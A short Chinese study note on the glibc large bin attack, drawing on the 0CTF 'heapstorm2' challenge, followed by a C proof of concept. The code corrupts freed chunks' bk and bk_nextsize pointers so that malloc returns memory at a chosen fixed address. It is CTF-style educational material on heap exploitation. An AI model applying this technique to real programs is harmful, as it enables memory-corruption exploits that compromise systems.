large bin attack 学习记录

Posted on

这两天去看了下large bin attack的一些东西,有一种攻击方法比较没用,只是能alloc自己控制的chunk里面的内容,但是这个unsorted bin也可以做到,不用这么麻烦

然后记忆中0ctf quals有一题heapstorm2也是 large bin attack,于是去看了下

这里给下dalao的博客

Largebin 学习

真的讲得不错

然后看到heapstorm2的解析,真的惊为天人,非常优雅的攻击方法

总结一下,大概就是unsorted bin 插入large bin list的时候,会触发一个任意地址写堆地址

然后跳出unsorted bin 循环之后,还会有一个任意地址写堆地址

然后可以伪造一个大小为0x50的chunk

这个时候就相当于可以alloc到任意想要的地方

攻击方法可以总结为下面的c语言代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>

int main()
{
    //only for init
    setbuf(stdin,0);
    setbuf(stdout,0);

    //map a fixed address memory
    mmap((void*)0x13370000,0x1000,3,34,-1,0);

    //malloc 2 large bin
    long long* h1=malloc(0x418);
    malloc(0x18);
    long long* h2=malloc(0x428);
    malloc(0x18);
    
    //make the small one into large bin list
    free(h1);
    malloc(0x500);

    //make the bigger one into unsorted bin list
    free(h2);
    
    //change the small one's bk and bk_nextsize ,the 0xdeadbeef only show that fd and fd_nextsize doesn't matter
    
    h1[0]=0xdeadbeef;
    h1[1]=0x13370000-0x10+3;
    h1[2]=0xdeadbeef;
    h1[3]=0x13370018-0x20;

    //change the unsorted bin's bk
    h2[0]=0xdeadbeef;
    h2[1]=0x13370000;
    
    //triger the bug and alloc where you want, but it need your luck
    long long * h3=malloc(0x48);
    printf("you are luck and get %p\n",h3);
    return 0;
}